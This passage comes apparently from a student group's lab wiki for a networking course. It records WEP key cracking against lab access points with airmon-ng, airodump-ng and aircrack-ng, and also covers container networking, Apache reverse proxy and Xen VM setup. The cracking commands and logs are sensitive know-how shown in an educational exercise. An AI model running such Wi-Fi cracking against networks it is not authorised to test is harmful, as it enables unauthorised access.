RCVD (0.2238s) ARP reply 10.2.0.2 is at 00:00:0C:9F:F0:32&lt;br /&gt;
SENT (1.0378s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
RCVD (1.2438s) ARP reply 10.2.0.2 is at 00:00:0C:9F:F0:32&lt;br /&gt;
SENT (2.0387s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
RCVD (2.0638s) ARP reply 10.2.0.2 is at 00:00:0C:9F:F0:32&lt;br /&gt;
SENT (3.0399s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
RCVD (3.0839s) ARP reply 10.2.0.2 is at 00:00:0C:9F:F0:32&lt;br /&gt;
SENT (4.0419s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
RCVD (4.1078s) ARP reply 10.2.0.2 is at 00:00:0C:9F:F0:32&lt;br /&gt;
SENT (5.0439s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
&lt;br /&gt;
root@zabeth17:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
# This file describes the network interfaces available on your system&lt;br /&gt;
# and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
auto wlx000fb5922374&lt;br /&gt;
iface wlx000fb5922374 inet static&lt;br /&gt;
 wireless-keymode open&lt;br /&gt;
 wireless-mode managed&lt;br /&gt;
 address 10.2.0.100&lt;br /&gt;
 netmask 255.255.0.0&lt;br /&gt;
 wireless-essid banane&lt;br /&gt;
 wireless-key 01234567891011121314151617&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
airmon-ng start wlx000fb5922374&lt;br /&gt;
root@zabeth17:/home/pifou# iwconfig&lt;br /&gt;
docker0   no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
vmnet1    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
vmnet8    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
vethea48f02  no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
vethc680cf4  no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
enp6s0    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
veth27a815a  no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
veth3773236  no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
vethf9b8093  no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
enp0s25   no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.447 GHz  Tx-Power=15 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          &lt;br /&gt;
bridge    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
vethb5bee00  no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
veth12b76b4  no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@zabeth17:/home/pifou# airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
 CH  8 ][ Elapsed: 6 s ][ 2017-12-12 15:04                                         &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                        &lt;br /&gt;
 C4:14:3C:12:61:C2  -67       26        0    0   9  54e. WEP  WEP         BORNE_TEST3                   &lt;br /&gt;
 C4:14:3C:12:61:C1  -61       28        0    0   9  54e. WEP  WEP         BORNE_TEST2                   &lt;br /&gt;
 C4:14:3C:40:78:60  -70       21        0    0   3  54e. WEP  WEP         ananas                        &lt;br /&gt;
 C4:14:3C:40:78:63  -76       20        0    0   3  54e. WEP  WEP         goyave                         &lt;br /&gt;
 C4:14:3C:12:61:C4  -68       25        0    0   9  54e. WEP  WEP         BORNE_TEST5                   &lt;br /&gt;
 C4:14:3C:12:61:C0  -68       27        0    0   9  54e. WEP  WEP         BORNE_TEST1                   &lt;br /&gt;
 C4:14:3C:12:61:C3  -63       25        0    0   9  54e. WEP  WEP         BORNE_TEST4                   &lt;br /&gt;
 C4:14:3C:40:78:61  -73       16        0    0   3  54e. WEP  WEP         banane                        &lt;br /&gt;
 C4:14:3C:40:78:64  -68       14        0    0   3  54e. WEP  WEP         groseille                     &lt;br /&gt;
 C4:14:3C:40:78:65  -74       22        0    0   3  54e. WEP  WEP         reseau1                       &lt;br /&gt;
 C4:14:3C:12:61:C5  -59       24        0    0   9  54e. WEP  WEP         BORNE_TEST6                    &lt;br /&gt;
 C4:14:3C:40:78:62  -72       16        0    0   3  54e. WEP  WEP         durian                        &lt;br /&gt;
 C4:14:3C:40:78:67  -77       16        0    0   3  54e. WEP  WEP         tomate                        &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                               &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 (not associated)   AC:AF:B9:B0:DF:32  -75    0 - 1      0        1  PolytechLille                       &lt;br /&gt;
 (not associated)   B8:08:D7:16:6E:69  -73    0 - 1      0        1                                      &lt;br /&gt;
 (not associated)   60:F4:45:D0:DA:DB  -73    0 - 1      0        2  PolytechLille  &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
pifou@zabeth15:~$ su&lt;br /&gt;
Password: &lt;br /&gt;
root@zabeth15:/home/pifou# iwconfig&lt;br /&gt;
vethbecbb63  no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
enp0s25   no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
enp6s0    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
docker0   no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
vmnet1    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
bridge    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
vmnet8    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wlx000fb5922266  IEEE 802.11  ESSID:off/any  &lt;br /&gt;
          Mode:Managed  Access Point: Not-Associated   Tx-Power=0 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:off&lt;br /&gt;
          Power Management:off&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@zabeth15:/home/pifou# airmon-ng start wlx000fb5922266&lt;br /&gt;
&lt;br /&gt;
Found 3 processes that could cause trouble.&lt;br /&gt;
If airodump-ng, aireplay-ng or airtun-ng stops working after&lt;br /&gt;
a short period of time, you may want to run 'airmon-ng check kill'&lt;br /&gt;
&lt;br /&gt;
  PID Name&lt;br /&gt;
 1695 dhclient&lt;br /&gt;
 2949 avahi-daemon&lt;br /&gt;
 2950 avahi-daemon&lt;br /&gt;
&lt;br /&gt;
PHY	Interface	Driver		Chipset&lt;br /&gt;
&lt;br /&gt;
phy0	wlx000fb5922266	p54usb		NetGear, Inc. WG111(v1) rev 2 54 Mbps Wireless [Intersil ISL3887]&lt;br /&gt;
Interface 15mon is too long for linux so it will be renamed to the old style (wlan#) name.&lt;br /&gt;
&lt;br /&gt;
		(mac80211 monitor mode vif enabled on [phy0]wlan0mon&lt;br /&gt;
		(mac80211 station mode vif disabled for [phy0]wlx000fb5922266)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@zabeth15:/home/pifou# airodump-ng --bssid C4:14:3C:40:78:61 -c 3 -w crack_wep_ungdelatte wlan0mon&lt;br /&gt;
&lt;br /&gt;
# -c 3 précise que le réseau est sur le channel 3.&lt;br /&gt;
# -w crack_wep_ungdelatte est le fichier qui va stocker les paquets capturés.&lt;br /&gt;
&lt;br /&gt;
 CH  3 ][ Elapsed: 20 mins ][ 2017-12-12 15:18                     &lt;br /&gt;
                                                                   &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  C&lt;br /&gt;
                                                                   &lt;br /&gt;
 C4:14:3C:40:78:61  -64   8    11488        0    0   3  54e. WEP  W&lt;br /&gt;
                                                                   &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@zabeth15:/home/pifou# aircrack-ng crack_wep_ungdelatte-01.cap&lt;br /&gt;
Opening crack_wep_ungdelatte-01.cap&lt;br /&gt;
Read 12494 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
&lt;br /&gt;
   1  C4:14:3C:40:78:61  banane                    No data - WEP or WPA&lt;br /&gt;
&lt;br /&gt;
Choosing first network as target.&lt;br /&gt;
&lt;br /&gt;
Opening crack_wep_ungdelatte-01.cap&lt;br /&gt;
Got no data packets from target network!&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@zabeth15:/home/pifou# airodump-ng --bssid C4:14:3C:40:78:61 -c 3 -w crack_wep_ungdelatte wlan0mon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 CH  3 ][ Elapsed: 28 mins ][ 2017-12-12 16:03                     &lt;br /&gt;
                                                                   &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  C&lt;br /&gt;
                                                                   &lt;br /&gt;
 C4:14:3C:40:78:61  -64   0    16423        0    0   3  54e. WEP  W&lt;br /&gt;
                                                                   &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames&lt;br /&gt;
                                                                   &lt;br /&gt;
&lt;br /&gt;
root@zabeth15:/home/pifou# ls&lt;br /&gt;
3D				       Documents&lt;br /&gt;
Arduino				       Downloads&lt;br /&gt;
crack_wep_ungdelatte-01.cap	       GIS4_Bernard_Castelein&lt;br /&gt;
crack_wep_ungdelatte-01.csv	       IMA5sc-ASR&lt;br /&gt;
crack_wep_ungdelatte-01.kismet.csv     Music&lt;br /&gt;
crack_wep_ungdelatte-01.kismet.netxml  Pictures&lt;br /&gt;
crack_wep_ungdelatte-02.cap	       Public&lt;br /&gt;
crack_wep_ungdelatte-02.csv	       R&lt;br /&gt;
crack_wep_ungdelatte-02.kismet.csv     replay_arp-1212-153701.cap&lt;br /&gt;
crack_wep_ungdelatte-02.kismet.netxml  Templates&lt;br /&gt;
Desktop				       Videos&lt;br /&gt;
root@zabeth15:/home/pifou# aircrack-ng crack_wep_ungdelatte-02.cap&lt;br /&gt;
Opening crack_wep_ungdelatte-02.cap&lt;br /&gt;
Read 13001 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
&lt;br /&gt;
   1  C4:14:3C:40:78:61  banane                    No data - WEP or WPA&lt;br /&gt;
&lt;br /&gt;
Choosing first network as target.&lt;br /&gt;
&lt;br /&gt;
Opening crack_wep_ungdelatte-02.cap&lt;br /&gt;
Got no data packets from target network!&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Quitting aircrack-ng...&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en réseau et création de conteneurs sous Machine Virtuelle Linux&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On se propose dans cette partie de réaliser la création et la mise en réseau de conteneurs sous Linux.&lt;br /&gt;
&lt;br /&gt;
Après avoir créé un système de fichiers avec debootstrap puis une machine virtuelle (IMA5-BANANE en l'occurence) sur le serveur de virtualisation Cordouan, on crée trois conteneurs C1, C2 et C3 distincts au sein celle-ci.&lt;br /&gt;
&lt;br /&gt;
Connecter les conteneurs en réseau :&lt;br /&gt;
&lt;br /&gt;
    créer une double interface Ethernet virtuelle ;&lt;br /&gt;
    sur l’hôte ajouter l’interface dans un pont virtuel ;&lt;br /&gt;
    envoyer le pair dans l’espace réseau du conteneur ;&lt;br /&gt;
    configurer l’adresse IP sur l’interface du conteneur ...&lt;br /&gt;
    ... il peut être nécessaire d’utiliser nsenter. &lt;br /&gt;
&lt;br /&gt;
Pour la création d'un conteneur, on utilise la commande unshare couplée à des options et à une fonction serverx.sh qui ne fait que repeter une fonction sleep 5 en boucle. Elle permet de lancer séparément une commande (ici /bin/serverx.sh) en définissant un root différent.&lt;br /&gt;
&lt;br /&gt;
    unshare -n -u -m -p -f chroot ./chroot /bin/serverx.sh&lt;br /&gt;
&lt;br /&gt;
Si on veut entrer dans le conteneur après en être sorti, on utilise la commande:&lt;br /&gt;
&lt;br /&gt;
    nsenter -n -u -m -p -t &amp;lt;PID&amp;gt; chroot ./chroot /bin/bash&lt;br /&gt;
&lt;br /&gt;
On ajoute alors toutes nos interfaces virtuelles eth0@vifX de type veth. Les Ponts &amp;quot;monpont&amp;quot; et &amp;quot;carrefour&amp;quot; ont déjà été définis dans /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
    ip link add vif1 type veth peer name eth0@vif1&lt;br /&gt;
    ip link add vif2 type veth peer name eth0@vif2&lt;br /&gt;
    ip link add vif3 type veth peer name eth0@vif3&lt;br /&gt;
    ip link add vif4 type veth peer name eth0@vif4&lt;br /&gt;
&lt;br /&gt;
On ajoute les vifx aux ponts correspondants&lt;br /&gt;
&lt;br /&gt;
    ip link set vif1 master monpont&lt;br /&gt;
    ip link set vif2 master carrefour &lt;br /&gt;
    ip link set vif3 master carrefour&lt;br /&gt;
    ip link set vif4 master carrefour&lt;br /&gt;
 &lt;br /&gt;
On peut vérifier la création à chaque commande grâce aux la commande:&lt;br /&gt;
&lt;br /&gt;
    ip l show et brctl show&lt;br /&gt;
&lt;br /&gt;
L'adresse ip de &amp;quot;monpont&amp;quot; est défini dans le fichier interfaces avec l'adresse 193.48.57.179 et est connecté au réseau via eth0&lt;br /&gt;
Nous avons choisis le reseau local entre les conteneur sur la plage 192.168.0.0/24. L'adresse de &amp;quot;carrefour&amp;quot; est 192.168.0.1.&lt;br /&gt;
&lt;br /&gt;
On peut alors définir eth0@vif1 (renommée eth0) comme étant l'interface entre le reverse proxy et &amp;quot;monpont&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
    ip link set eth0@vif1 netns /proc/&amp;lt;PID&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
On peut alors définir eth0@vif2 (renommée eth1) comme étant l'interface entre le reverse proxy et les carrefour.&lt;br /&gt;
&lt;br /&gt;
    ip link set eth0@vif2 netns /proc/&amp;lt;PID&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
On peut alors définir eth0@vif3 et eth0@vif4 (renommées eth0) comme étant les interfaces respectives entre le server1, serveur 2 et le pont carrefour.&lt;br /&gt;
&lt;br /&gt;
    ip link set eth0@vif3 netns /proc/&amp;lt;PID&amp;gt;/ns/net name eth0&lt;br /&gt;
    ip link set eth0@vif4 netns /proc/&amp;lt;PID&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur &amp;quot;chroot&amp;quot;, on ajoute alors l'adresse IP 193.48.57.189/28 à eth0 et on active eth0, vif1 et &amp;quot;monpont&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
    ip addr add 193.48.57.189/28 dev eth0&lt;br /&gt;
    ip link set dev eth0 up&lt;br /&gt;
    ip link set vif1 up&lt;br /&gt;
    ip link set dev monpont up&lt;br /&gt;
&lt;br /&gt;
Dans le conteneurs serverX et dans le reverse proxy, on ajoute alors les adresse IP 192.168.0.100/24 et 192.168.0.200/24 et 192.168.0.150/24 aux eth0 respectifs puis on active vif2 vif3 vif4 et &amp;quot;carrefour&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Le réseau étant fonctionnel nous pouvons nous attaquer à la configuration des serveur apache2.&lt;br /&gt;
&lt;br /&gt;
Nous avons donc installé un serveur apache2 dans chaque conteneur.&lt;br /&gt;
&lt;br /&gt;
Pour ce qui est du serveur apache qui jouera le rôle de reverse proxy le fichier de configuration se trouvant dans /etc/apache2/sites-available sera configuré de la manière suivante:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 ServerName 193.48.57.189:80&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.189:80&amp;gt;&lt;br /&gt;
 ServerName reverse.banane.space&lt;br /&gt;
 DocumentRoot /var/www/html&lt;br /&gt;
 ProxyPass / http://192.168.0.100:631&lt;br /&gt;
 ProxyPassReverse / http://192.168.0.100:631&lt;br /&gt;
 ProxyRequests Off&lt;br /&gt;
 LogFormat &amp;quot;%h %l %u %t \&amp;quot;%r\&amp;quot; %&amp;gt;s %b&amp;quot; common&lt;br /&gt;
 CustomLog logs/access_log common&lt;br /&gt;
 &amp;lt;VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On retrouve l'adresse du serveur apache qui correspond à celle du conteneur relié au réseau 192.48.57.189.&lt;br /&gt;
&lt;br /&gt;
On redirigera les requêtes via le port 631 (TCP/UDP) toutefois il est tout à fais possible de le faire circuler sur le port 80 car les serveurs se trouvent normalement dans des conteneurs.&lt;br /&gt;
&lt;br /&gt;
Au niveau de '''server1'''(équivalent pour server2) j'ai seulement cré un serveur apache2 sous cette forme:&lt;br /&gt;
&lt;br /&gt;
 ServerName 192.168.0.100:631&lt;br /&gt;
 &amp;lt;VirtualHost 192.168.0.100:631&amp;gt;&lt;br /&gt;
 ServerName site1.banane.space&lt;br /&gt;
 DocumentRoot /var/www/html&lt;br /&gt;
 LogFormat &amp;quot;%h %l %u %t \&amp;quot;%r\&amp;quot; %&amp;gt;s %b&amp;quot; common&lt;br /&gt;
 CustomLog logs/access_log common&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
il peut être nécessaire de demander dans ports.conf d'écouter le port 631.&lt;br /&gt;
&lt;br /&gt;
Dans le dns db.banane.space nous avons rajouter les différentes adresses:&lt;br /&gt;
&lt;br /&gt;
 reverse IN	A	193.48.57.189&lt;br /&gt;
 site1   IN	A	193.48.57.189&lt;br /&gt;
 site2	 IN	A	193.48.57.189&lt;br /&gt;
&lt;br /&gt;
Nous n'avons pas réussis à tester le fonctionnement car nous avons rencontré une erreur au niveau de la commande '''nsenter'''. en effet les conteneur ne sont pas isolés des processus extérieurs. Tous nos serveurs apaches ce sont donc installés or des '''unshare''' et forcément ne cohabitent donc pas très bien ensemble. Nous avons trouvé une piste qui serait en lien avec le /proc/self du système. la commande '''nsenter''' ne reconnaît pas les processus monté pas '''mount'''&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46621</id>
		<title>Cahier 2017 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46621"/>
				<updated>2017-12-13T14:20:35Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Mise en réseau et création de conteneurs sous Machine Virtuelle Linux */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Présentation générale'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en contexte&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
Le projet de Réseau Avancé est composé d'une partie commune et d'une tâche particulière par binôme. Ce projet consiste en la configuration d'une architecture réseau avec différentes parties, en plus du câblage et de la configuration des routeurs et commutateurs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La partie commune consiste en la création et la mise en réseau d'une machine virtuelle; ainsi que la création d'un site sécurisé avec la configuration du serveur SSH, DNS sécurisé et du certificat SSL. La virtualisation permet de faire fonctionner sur une même machine plusieurs OS isolés ou des logiciels grâce aux machines virtuelles. Au-delà de la réduction des coûts, la virtualisation permet aussi de manipuler et gérer plus facilement des OS. Cependant, on s'oriente de plus en plus vers l'isolation par des conteneurs car ils permettent au sein d'un même OS, d'isoler les ressources matérielles et d'éviter des surcharges.&lt;br /&gt;
&lt;br /&gt;
Notre tâche particulière est donc de réaliser la gestion des conteneurs au sein d'une machine virtuelle configurée en réseau.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Tâches à effectuer&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
* Création d'une machine virtuelle sur le serveur de virtualisation Cordouan&lt;br /&gt;
* Mettre la machine virtuelle en réseau&lt;br /&gt;
* Configuration des services Internet (Serveur SSH, DNS, DNSSEC, Certificat SSL)&lt;br /&gt;
* Crackage de clé Wi-Fi&lt;br /&gt;
* Créer les différents conteneurs et configurer leur accès au réseau (tâche particulière)&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Travail effectué'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
                     &lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Création d'une machine virtuelle Xen sur Cordouan&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On commence par créer une machine virtuelle Xen sur le serveur de virtualisation cordouan.insecserv.deule.net. On se connecte tout d'abord en SSH sur le serveur cordouan.&lt;br /&gt;
&lt;br /&gt;
       ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
       Mot de passe: mot de passe root habituel&lt;br /&gt;
&lt;br /&gt;
On précise:&lt;br /&gt;
&lt;br /&gt;
* le nom de machine virtuelle: IMA5-BANANE&lt;br /&gt;
* son adresse IP sur le réseau: 193.48.57.179/28&lt;br /&gt;
* le répertoire où créer les disques virtuels: /usr/local/xen&lt;br /&gt;
* le miroir Debian: http://debian.polytech-lille.fr/debian&lt;br /&gt;
* la distribution: jessie (qui est la distribution stable courante)&lt;br /&gt;
&lt;br /&gt;
       xen-create-image --hostname=&amp;lt;IMA5-BANANE&amp;gt; --ip 193.48.57.179/28 --dir /usr/local/xen --netmask=255.255.255.240 --gateway=193.48.57.177 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte. Installez les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind (voir la partie services).&lt;br /&gt;
&lt;br /&gt;
       xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-home -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-var -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
[[Fichier:IMA5-BANANE.png]]&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration en faisant en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&lt;br /&gt;
* la mémoire attribuée: 512 Mo&lt;br /&gt;
* l'adresse ip de la MV: 193.48.57.179/28&lt;br /&gt;
* bridge: IMA5sc&lt;br /&gt;
&lt;br /&gt;
       xl list&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# xl list&lt;br /&gt;
       Name                                        ID   Mem VCPUs	State	Time(s)&lt;br /&gt;
       Domain-0                                     0  1993     8     r-----   52219.3&lt;br /&gt;
       karmeliett                                   1   128     1     -b----    2483.6&lt;br /&gt;
       duvel                                        2   512     1     -b----    4225.6&lt;br /&gt;
       deus                                         3   512     1     -b----    4226.4&lt;br /&gt;
       trappe                                       4   512     1     -b----    4082.4&lt;br /&gt;
       Rincecochon                                  6   512     1     -b----    3788.2&lt;br /&gt;
       IMA5-Durian                                 62   512     1     -b----    3237.7&lt;br /&gt;
       IMA5-BANANE                                 84   512     1     -b----     152.9&lt;br /&gt;
       IMA5-Papaye                                 89   512     1     -b----      35.4&lt;br /&gt;
       IMA5-Ananas                                 91   512     1     -b----      27.0&lt;br /&gt;
&lt;br /&gt;
On vérifie que la MV IMA5-BANANE a bien été créée.&lt;br /&gt;
&lt;br /&gt;
       xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On lance IMA5-BANANE en utilisant le log root et le mot de passe configuré.&lt;br /&gt;
&lt;br /&gt;
Commandes de base pour démarrer la VM proprement: &lt;br /&gt;
&lt;br /&gt;
    ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
    xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
    ssh username@weppes&lt;br /&gt;
    ssh root@193.48.57.179&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Services Internet (SSH, DNS sécurisé et certificat SSL)&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On configure à présent les services Internet après avoir acheté un nom de domaine (https://www.banane.space) sur gandi.net pour créer notre site Web sécurisé.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur SSH''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle, nous avons configuré le fichier sshd_config (PubkeyAuthentication ) :&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# vim /etc/ssh/sshd_config&lt;br /&gt;
       &lt;br /&gt;
    RSAAuthentication yes&lt;br /&gt;
    PubkeyAuthentication yes&lt;br /&gt;
    #AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
    PermitRootLogin yes&lt;br /&gt;
       &lt;br /&gt;
    root@IMA5-BANANE:~# service ssh restart&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Certification SSL''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
Nous commencons par acheter un certificat SSL. Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout banane.key -out banane.csr&lt;br /&gt;
    Generating a 2048 bit RSA private key&lt;br /&gt;
    If you enter '.', the field will be left blank.&lt;br /&gt;
    -----&lt;br /&gt;
    Country Name (2 letter code) [AU]:FR&lt;br /&gt;
    State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
    Locality Name (eg, city) []:Lille&lt;br /&gt;
    Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
    Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
    Common Name (e.g. server FQDN or YOUR name) []:banane.space&lt;br /&gt;
    Email Address []:&lt;br /&gt;
    A challenge password []:&lt;br /&gt;
    An optional company name []:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2/sites-available/clef# ls banane.csr banane.key&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2/sites-available/clef# cat banane.csr&lt;br /&gt;
    -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
    &amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
